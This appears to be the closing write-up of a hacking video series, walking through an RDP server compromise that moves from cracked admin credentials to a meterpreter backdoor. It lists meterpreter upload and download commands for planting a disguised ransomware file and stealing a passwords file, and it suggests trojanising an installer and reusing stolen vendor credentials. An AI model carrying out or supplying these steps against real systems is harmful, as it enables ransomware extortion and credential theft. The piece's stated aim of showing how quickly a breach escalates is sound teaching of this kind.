I hope you have enjoyed this short series of RDP hacking. The aim was to show how quickly things can snow ball when just one user becomes compromised on a shared resource like an RDP server. Anyway, back to this last video in the series.
If you haven’t watched the previous videos and you are not sure how we got to this point, I’d recommend watching them so you are up to speed.
As a recap we have compromised the guest user on an RDP server, then dumped all available credentials from memory, we then cracked the hashes and see what other credentials we get.
We managed to crack 3 of the hashes giving us the logins for the following accounts;
We logged in with thirdparty.adm as in general these accounts are poorly maintained, and not regularly used. There are also used by lot’s of different support engineers so changes or suspicious activity is unlikely to be noticed, whereas an admin for the company themselves are usually more diligent.
We want to copy over some malicious files but find that clipboard/copy and paste is disabled for this account meaning we need to find another way to get our files on the target machine.
We start another listener in metasploit, then manually browse back to our evil website which we used to compromise the guest account as we know this works and was not spotted previously.
We download and run the malware which gives us a backdoor into the machine.
We then use meterpreter to upload our ransomware file which we will use to encrypt the entire server, and also download any files of interest. We take passwords file (Although in reality we would take a copy of EVERYTHING) as vendors will often reuse credentials so we save these for if we come across this thirdparty again or perhaps use them to start a targeted attack against the third party vendor. We could also take the installer, inject it with malware then upload to a “freeware” site offering it with licence keys for download to help us infect more machines. Everything can be used in some way to help us in our malicious activities.
Meterpreter commands used in this video are;
- upload RansomwareFile.Docx.bat c:\\users\\thirdparty.adm\\Documents\\RansomwareFile.docx.bat; Here we use the “upload” command, followed by our ransomware malware file, then state the location on the victim we wish to upload the file to. Note the double back slash.
- download c:\\users\\thirdparty.adm\\Documents\\passwords.rft Here we simply use the “download” command and state the file and location. Note the double back slash.
Once we have stolen all we want, we just need to run our malware. Now we want to ensure that it runs with the highest permissions so it has access to as much data across the machine as possible. This is where we will use the server.adm, or backup.adm accounts if we need them.
We right click to run our malicious file as administrator and bingo, we do not even need our other accounts. The third party account is running with local admin so our ransomware completes without issue. Success!
Hope you enjoy the video, and this series. We will pick a new topic and do another short series.